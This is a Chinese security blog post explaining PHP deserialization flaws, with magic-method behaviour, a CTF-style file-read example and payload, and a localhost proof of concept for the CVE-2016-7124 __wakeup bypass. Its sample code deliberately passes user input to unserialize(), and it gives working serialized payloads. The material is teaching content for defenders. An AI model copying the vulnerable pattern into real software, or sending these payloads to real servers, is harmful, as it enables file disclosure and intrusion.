<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.cat.net/css?family=Lato:300,300italic,400,400italic,700,700italic|Fira Code:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"swanq.top","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="0x01 原理解释 PHP的反序列化漏洞其实是PHP对象的属性篡改漏洞。漏洞的成因在于代码中unserialize的参数不可控。导致服务器能够接收我们反序列化过的字符串、并且未经过滤的把其中的变量直接放进魔术方法里面执行以实现攻击.    PHP unserialization vulnerability is actually a PHP object property tamper vulne">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP反序列化原理及各种利用方式">
<meta property="og:url" content="http://swanq.top/2021/03/24/php-unserialize/index.html">
<meta property="og:site_name" content="SwanQ&#39;s blog">
<meta property="og:description" content="0x01 原理解释 PHP的反序列化漏洞其实是PHP对象的属性篡改漏洞。漏洞的成因在于代码中unserialize的参数不可控。导致服务器能够接收我们反序列化过的字符串、并且未经过滤的把其中的变量直接放进魔术方法里面执行以实现攻击.    PHP unserialization vulnerability is actually a PHP object property tamper vulne">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://swanq.top/2021/03/24/php-unserialize/1.jpg">
<meta property="og:image" content="http://swanq.top/2021/03/24/php-unserialize/2.png">
<meta property="og:image" content="http://swanq.top/2021/03/24/php-unserialize/3.png">
<meta property="og:image" content="http://swanq.top/2021/03/24/php-unserialize/4.png">
<meta property="og:image" content="http://swanq.top/2021/03/24/php-unserialize/5.png">
<meta property="og:image" content="http://swanq.top/2021/03/24/php-unserialize/6.png">
<meta property="article:published_time" content="2021-03-24T07:48:16.000Z">
<meta property="article:modified_time" content="2021-04-06T13:55:28.957Z">
<meta property="article:author" content="swanQ">
<meta property="article:tag" content="web安全">
<meta property="article:tag" content="网络安全">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="PHP">
<meta property="article:tag" content="反序列化原理">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://swanq.top/2021/03/24/php-unserialize/1.jpg">

<link rel="canonical" href="http://swanq.top/2021/03/24/php-unserialize/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>PHP反序列化原理及各种利用方式 | SwanQ's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">SwanQ's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">有趣的是有道理且新奇，胡思乱想并不有趣。</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">13</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">3</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">8</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

  <a href="https://github.com/swanQs" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://swanq.top/2021/03/24/php-unserialize/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/author.jpg">
      <meta itemprop="name" content="swanQ">
      <meta itemprop="description" content="Try & Enjoy">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="SwanQ's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          PHP反序列化原理及各种利用方式
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-03-24 15:48:16" itemprop="dateCreated datePublished" datetime="2021-03-24T15:48:16+08:00">2021-03-24</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-04-06 21:55:28" itemprop="dateModified" datetime="2021-04-06T21:55:28+08:00">2021-04-06</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" itemprop="url" rel="index"><span itemprop="name">漏洞分析</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="0x01-原理解释"><a href="#0x01-原理解释" class="headerlink" title="0x01 原理解释"></a>0x01 原理解释</h2><blockquote>
<p><strong>PHP的反序列化漏洞</strong>其实是PHP对象的属性篡改漏洞。漏洞的成因在于代码中unserialize的参数不可控。导致服务器能够接收我们反序列化过的字符串、并且未经过滤的把其中的变量直接放进魔术方法里面执行以实现攻击. </p>
</blockquote>
<blockquote>
<p>PHP unserialization vulnerability is actually a PHP object property tamper vulnerability.The cause of the vulnerability is that the parameters of unserialize in the code are not controllable.The server was able to receive the deserialized string and unfiltered its variables directly into the magic method to execute the attack.**PHP deserialization vulnerability ** is actually a PHP object property tamper vulnerability.The cause of the vulnerability is that the parameters of unserialize in the code are not controllable.The server was able to receive the deserialized string and unfiltered its variables directly into the magic method to execute the attack.</p>
</blockquote>
<h3 id="1-基础知识"><a href="#1-基础知识" class="headerlink" title="1. 基础知识"></a>1. 基础知识</h3><ol>
<li>php源码同python一样是由c所写</li>
<li>可以序列化的对象都可以反序列化</li>
<li>序列化只序列化对象的属性，不序列化方法</li>
<li>序列化后包括，类为object,类长度为4，名为test,包含3个属性：<br>第一个属性为string,长度为10，名为testflag;值长度为6，名为active；因为<strong>prvate</strong>,故而序列化后，原名test被更改<br>第二个同上; 因为<strong>protected</strong>，故而序列化后,原名前加*<br>第三个同上; 因为<strong>public</strong>，故而序列化后,原名不变<br><img src="/2021/03/24/php-unserialize/1.jpg"><br>private序列化后格式：%00类名%00属性名<br><img src="/2021/03/24/php-unserialize/2.png"><br>protected序列化后格式：%00*%00<br><img src="/2021/03/24/php-unserialize/3.png"></li>
</ol>
<h3 id="2-魔术方法"><a href="#2-魔术方法" class="headerlink" title="2. 魔术方法"></a>2. 魔术方法</h3><p>魔术方法(Magic methods)：以两个下划线__开头，包括：<br>(1)__construct()，类的构造函数，当对象创建时会自动调用(但在unserialize()时是不会自动调用的)<br>(2)__sleep()，执行serialize()时，先会调用这个函数<br>(3)__wakeup()，unserialize()时，先会调用这个函数<br>(4)__destruct()，类的析构函数，当对象被销毁时会自动调用<br>(5)__toString()，类被当成字符串时的回应方法。当反序列化后的对象被输出在模板中的时候（转换成字符串的时候）自动调用<br>(6)__get()，获得一个类的成员变量时调用。当从不可访问的属性读取数据<br>(7)__call()，在对象中调用一个不可访问方法时调用<br>(8)__callStatic()，用静态方式中调用一个不可访问方法时调用<br>(9)__set()，设置一个类的成员变量时调用</p>
<hr>
<p>其中，__toString()触发条件较多，包括以下：</p>
<p>(1)echo ($obj) / print($obj) 打印时会触发</p>
<p>(2)反序列化对象与字符串连接时</p>
<p>(3)反序列化对象参与格式化字符串时</p>
<p>(4)反序列化对象与字符串进行==比较时（PHP进行==比较的时候会转换参数类型）</p>
<p>(5)反序列化对象参与格式化SQL语句，绑定参数时</p>
<p>(6)反序列化对象在经过php字符串函数，如 strlen()、addslashes()时</p>
<p>(7)在in_array()方法中，第一个参数是反序列化对象，第二个参数的数组中有toString返回的字符串的时候toString会被调用</p>
<p>(8)反序列化的对象作为 class_exists() 的参数的时候</p>
<h3 id="3-序列化与反序列化"><a href="#3-序列化与反序列化" class="headerlink" title="3. 序列化与反序列化"></a>3. 序列化与反序列化</h3><p>序列化$data并输出到serialize.txt文件中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class test &#123;</span><br><span class="line">    private $flag &#x3D; &#39;Inactive&#39;;</span><br><span class="line">    protected $test &#x3D; &#39;test&#39;;</span><br><span class="line">    public $test1 &#x3D; &#39;test1&#39;;</span><br><span class="line"></span><br><span class="line">    public function set_flag($flag)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;flag &#x3D; $flag;</span><br><span class="line">    &#125;</span><br><span class="line">    public function get_flag($flag)</span><br><span class="line">    &#123;</span><br><span class="line">        return $this-&gt;flag;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$object &#x3D; new test();</span><br><span class="line">$object-&gt;set_flag(&#39;active&#39;);</span><br><span class="line">$data &#x3D; serialize($object);</span><br><span class="line">file_put_contents(&quot;serialize.txt&quot;,$data);</span><br><span class="line">echo $data;</span><br></pre></td></tr></table></figure>
<p>反序列化serialize.txt</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class test</span><br><span class="line">&#123;</span><br><span class="line">    private $flag &#x3D; &#39;Inactive&#39;;</span><br><span class="line">    protected $test &#x3D; &quot;test&quot;;</span><br><span class="line">    public $test1 &#x3D; &quot;test1&quot;;</span><br><span class="line">    public function set_flag($flag)</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;flag &#x3D; $flag;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function get_flag()</span><br><span class="line">    &#123;</span><br><span class="line">        return $this-&gt;flag;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$data &#x3D; file_get_contents(&quot;serialize.txt&quot;);</span><br><span class="line">$data &#x3D; unserialize($data);</span><br><span class="line">echo $data-&gt;test1.&quot;&lt;br&gt;&quot;;</span><br><span class="line">echo $data-&gt;get_flag(); &#x2F;&#x2F; correspond to serialize.php</span><br></pre></td></tr></table></figure>
<p>魔术方法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">class swanQ</span><br><span class="line">&#123;</span><br><span class="line">    private $name &#x3D; &#39;swanQ&#39;;</span><br><span class="line">    function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &quot;__construct&quot;;</span><br><span class="line">        echo &quot;&lt;&#x2F;br&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __sleep()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &quot;__sleep&quot;;</span><br><span class="line">        echo &quot;&lt;&#x2F;br&gt;&quot;;</span><br><span class="line">        return array(&#39;name&#39;); &#x2F;&#x2F;**</span><br><span class="line">    &#125;</span><br><span class="line">    function __wakeup()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &quot;__wakeup&quot;;</span><br><span class="line">        echo &quot;&lt;&#x2F;br&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    function __destruct()</span><br><span class="line">    &#123;</span><br><span class="line">        echo &quot;__destruct&quot;;</span><br><span class="line">        echo &quot;&lt;&#x2F;br&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    function __toString()&#123;</span><br><span class="line">        return &quot;__toString&quot;.&quot;&lt;&#x2F;br&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$object &#x3D; new swanQ();</span><br><span class="line"></span><br><span class="line">$data &#x3D; serialize($object);</span><br><span class="line">$object1 &#x3D; unserialize($data);</span><br><span class="line">print $object1;</span><br></pre></td></tr></table></figure>
<p><img src="/2021/03/24/php-unserialize/4.png"><br>新建一个对象时，会自动调用__construct()方法,<br>执行serialize前，会先调用共__sleep()方法<br>执行unserialize前，会先调用__wakeup()方法<br>__destruct()了两次说明，当前有两个对象，一个是将类实例化为对象的时候产生的，一个是反序列化后生成的对象。</p>
<h3 id="4-攻击示例"><a href="#4-攻击示例" class="headerlink" title="4.攻击示例"></a>4.攻击示例</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">&#x2F;&#x2F;flag is in ctf.php</span><br><span class="line">class Shield&#123;</span><br><span class="line">    public $file;</span><br><span class="line">    function __construct($filename &#x3D; &#39;&#39;)&#123;</span><br><span class="line">        $this-&gt;file &#x3D; $filename;</span><br><span class="line">    &#125;</span><br><span class="line">    function readfile()&#123;</span><br><span class="line">        if (!empty($this-&gt;file) &amp;&amp; stripos($this-&gt;file,&#39;..&#39;) &#x3D;&#x3D;&#x3D; FALSE</span><br><span class="line">        &amp;&amp; stripos($this-&gt;file,&#39;&#x2F;&#39;) &#x3D;&#x3D;&#x3D; FALSE &amp;&amp; stripos($this-&gt;file,&#39;\\&#39;)&#x3D;&#x3D;&#x3D;FALSE)&#123;</span><br><span class="line">            return @file_get_contents($this-&gt;file);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>shield.php,类中存在属性$file,且file会调用__construct方法。所以我们利用file即可。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">require_once (&#39;shield.php&#39;);</span><br><span class="line">$x &#x3D; new Shield();</span><br><span class="line">isset($_GET[&#39;class&#39;]) &amp;&amp; $g &#x3D; $_GET[&#39;class&#39;];</span><br><span class="line">if (!empty($g))&#123;</span><br><span class="line">    $x &#x3D; unserialize($g);</span><br><span class="line">&#125;</span><br><span class="line">echo $x-&gt;readfile();</span><br></pre></td></tr></table></figure>
<p>包含shield.php,new实例时会调用__construct()方法，然后接收用户的反序列化并输出。<br>payload:直接构造序列化对象作为file的内容，O:6:”Shield”:1{s:4:”file”;s:8:”ctf.php”;}</p>
<h2 id="0x02-php绕过-wakeup：-CVE-2016-7124"><a href="#0x02-php绕过-wakeup：-CVE-2016-7124" class="headerlink" title="0x02 php绕过__wakeup： CVE-2016-7124"></a>0x02 php绕过__wakeup： CVE-2016-7124</h2><h3 id="1-漏洞原理"><a href="#1-漏洞原理" class="headerlink" title="1.漏洞原理"></a>1.漏洞原理</h3><p>执行unserialize前，会先调用__wakeup()方法, 但是当序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行。</p>
<h3 id="2-漏洞复现"><a href="#2-漏洞复现" class="headerlink" title="2.漏洞复现"></a>2.漏洞复现</h3><ul>
<li><p>漏洞影响版本：<br>PHP5 &lt; 5.6.25<br>PHP7 &lt; 7.0.10</p>
</li>
<li><p>复现环境</p>
<p>php5.4.5nts+apache+mysql（phpstudy）</p>
</li>
<li><p>编写测试脚本：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">class test&#123;</span><br><span class="line">    public $name &#x3D; &quot;fairy&quot;;</span><br><span class="line">    public function  __wakeup()&#123;</span><br><span class="line">        echo &quot;this is __wakeup&lt;br&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">    public function __destruct()&#123;</span><br><span class="line">        echo &quot;this is __destruct&lt;br&gt;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$str &#x3D; $_GET[&quot;s&quot;];</span><br><span class="line">@$un_str &#x3D; unserialize($str);</span><br><span class="line"></span><br><span class="line">echo  $un_str-&gt;name.&quot;&lt;br&gt;&quot;;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>接收参数s，将其反序列化后输出属性name的值。</p>
</li>
</ul>
<p>编写POC访问该脚本</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost&#x2F;test.php?s&#x3D;O:4:&quot;test&quot;:1:&#123;s:4:&quot;name&quot;;s:5:&quot;fairy&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/2021/03/24/php-unserialize/5.png"></p>
<p>反序列化之前先调用了__wakeup方法，再调用__destruct方法。</p>
<p>构造payload将传入的序列化数据的对象变量个数由1加至2，绕过__wakeup方法执行。–反序列化数据失败无法创建对象的原因</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">O:4:&quot;test&quot;:1:&#123;s:4:&quot;name&quot;;s:5:&quot;fairy&quot;;</span><br><span class="line">O:4:&quot;test&quot;:2:&#123;s:4:&quot;name&quot;;s:5:&quot;fairy&quot;;</span><br></pre></td></tr></table></figure>
<p><img src="/2021/03/24/php-unserialize/6.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"></span><br></pre></td></tr></table></figure>

<p>具体复现各位看官自己尝试</p>
<h2 id="0x03"><a href="#0x03" class="headerlink" title="0x03"></a>0x03</h2><h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p>[1]深入理解PHP反序列化漏洞:<a target="_blank" rel="noopener" href="https://www.k0rz3n.com/2018/11/19/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/">https://www.k0rz3n.com/2018/11/19/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/</a><br>[2]CVE-2016-7124——php绕过__wakeup():<a target="_blank" rel="noopener" href="http://www.cl4y.top/521/">http://www.cl4y.top/521/</a></p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>swanQ
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://swanq.top/2021/03/24/php-unserialize/" title="PHP反序列化原理及各种利用方式">http://swanq.top/2021/03/24/php-unserialize/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

	  <div>
      
       <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">你想在文章末尾对读者说的话</div>
    
</div>
      
      </div>
      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/web%E5%AE%89%E5%85%A8/" rel="tag"># web安全</a>
              <a href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" rel="tag"># 网络安全</a>
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"># 渗透测试</a>
              <a href="/tags/PHP/" rel="tag"># PHP</a>
              <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%8E%9F%E7%90%86/" rel="tag"># 反序列化原理</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/23/think/" rel="prev" title="夜思">
      <i class="fa fa-chevron-left"></i> 夜思
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/03/24/changAnCup/" rel="next" title="2019 ChangAn Cup复盘">
      2019 ChangAn Cup复盘 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-%E5%8E%9F%E7%90%86%E8%A7%A3%E9%87%8A"><span class="nav-number">1.</span> <span class="nav-text">0x01 原理解释</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="nav-number">1.1.</span> <span class="nav-text">1. 基础知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95"><span class="nav-number">1.2.</span> <span class="nav-text">2. 魔术方法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96"><span class="nav-number">1.3.</span> <span class="nav-text">3. 序列化与反序列化</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-%E6%94%BB%E5%87%BB%E7%A4%BA%E4%BE%8B"><span class="nav-number">1.4.</span> <span class="nav-text">4.攻击示例</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-php%E7%BB%95%E8%BF%87-wakeup%EF%BC%9A-CVE-2016-7124"><span class="nav-number">2.</span> <span class="nav-text">0x02 php绕过__wakeup： CVE-2016-7124</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="nav-number">2.1.</span> <span class="nav-text">1.漏洞原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">2.2.</span> <span 